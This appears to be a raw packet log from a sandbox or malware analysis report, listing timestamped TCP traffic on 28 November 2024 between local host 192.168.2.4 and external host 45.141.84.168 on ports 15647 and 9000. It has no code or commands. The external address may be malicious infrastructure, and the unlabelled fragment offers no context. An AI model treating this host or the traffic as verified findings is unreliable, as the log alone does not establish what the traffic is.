                                          Nov 28, 2024 13:40:24.487694979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.487962961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.496273041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.497225046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.503540993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.503557920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.503637075 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.511599064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.511764050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.515003920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.515208960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.528780937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.528883934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.528902054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.529042959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.531763077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.531985044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.543323040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.547723055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.547776937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.547806025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.564562082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.564712048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.578568935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.581974030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.582101107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.591792107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.591908932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.604367971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.604451895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.617750883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.625550032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.625566959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.625754118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.639179945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.639252901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.654422045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.664750099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.665060997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.681540966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.687036037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.687105894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.695764065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.695854902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.695931911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.704405069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.709738970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.713171959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.715913057 CET90004982545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.716016054 CET90004982545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.716053009 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.716157913 CET498259000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.716157913 CET498259000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.716734886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.719880104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.720093012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.729738951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.729876995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.738651037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.738728046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.745467901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.748580933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.748888969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.749011040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.749041080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.759567022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.760025978 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.765958071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.766063929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.766096115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.770298958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.783747911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.783787012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.783824921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.783854008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.783906937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.785442114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.788096905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.793050051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.793113947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.793411970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.809067965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.809238911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.809858084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.809953928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.810247898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.823682070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.826983929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.829816103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.830061913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.830796003 CET498289000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.837405920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.837477922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.837630987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.848666906 CET90004982545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.848717928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.848867893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.859785080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.859898090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.860085011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.872059107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.872262955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.873701096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.873802900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.873904943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.887969017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.888052940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.888230085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.893394947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.896193981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.904613018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.904681921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.904706955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.906790018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.906872034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.907959938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.908117056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.921006918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.921164989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.925790071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.925873995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.931494951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.940068007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.940144062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.946964979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.947048903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.951879978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.952013969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.958817959 CET90004982845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.959266901 CET498289000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.959476948 CET498289000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.960395098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.960530996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.970737934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.971611977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.984577894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.984648943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.984675884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.994201899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.994250059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:24.994330883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:24.998534918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.010591984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.010617018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.010647058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.022186995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.025201082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.028548956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.028610945 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.033056021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.033183098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.034375906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.034435034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.038419962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.038652897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.050261021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.050584078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.060906887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.061074018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.073467016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.073676109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.083545923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.083583117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.083683968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.094955921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.095007896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.095093012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.097424030 CET90004982845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.098480940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.098568916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.105736017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.105940104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.120870113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.122251034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.122327089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.122364044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.122762918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.132930994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.132949114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.133009911 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.148022890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.148140907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.148175955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.148638964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.153121948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.153270006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.158705950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.158904076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.171972036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.172027111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.172257900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.184346914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.184561968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.186275959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.186521053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.195231915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.195276022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.207075119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.207097054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.207161903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.214260101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.214335918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.223808050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.223983049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.229454994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.229623079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.229650021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.244381905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.244488001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.246992111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.247057915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.247086048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.248910904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.248976946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.255713940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.255784035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.266457081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.266535044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.266539097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.272262096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.274437904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.274477959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.278945923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.286818981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.286858082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.286895037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.286938906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.304564953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.304590940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.304617882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.306283951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.306361914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.315191031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.315305948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.324603081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.324696064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.324964046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.325026989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.338313103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.338361979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.338428020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.343905926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.344077110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.352519035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.352554083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.352672100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.360122919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.364444017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.372951031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.372999907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.375745058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.376615047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.376662016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.376696110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.376751900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.392066956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.400240898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.400331020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.400332928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.416768074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.421864033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.422019958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.430727959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.430775881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.430825949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.445152044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.445858955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.445960045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.452688932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.452775955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.457070112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.457192898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.464148998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.464235067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.467708111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.467803001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.477165937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.477225065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.493077040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.493125916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.502190113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.502218962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.502242088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.516578913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.516629934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.516657114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.516700029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.529768944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.534008980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.534190893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.534250021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.536823034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.536896944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.545188904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.545202017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.545305967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.555773020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.556013107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.568114042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.568331003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.572755098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.572838068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.580806971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.580822945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.580895901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.585083008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.585154057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.593414068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.593565941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.606142044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.606209993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.620533943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.626013994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.626049042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.626099110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.636912107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.637017012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.651175022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.651177883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.654083014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.654167891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.656848907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.656910896 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.669760942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.670023918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.678268909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.678400040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.686263084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.686393976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.692692995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.694341898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.694410086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.694478989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.694519997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.703083992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.703130007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.716933012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.716984987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.717089891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.732913971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.733042002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.738142014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.738277912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.738321066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.741919994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.742010117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:25.743223906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:25.743279934 CET4973015647192.168.2.445.141.84.168
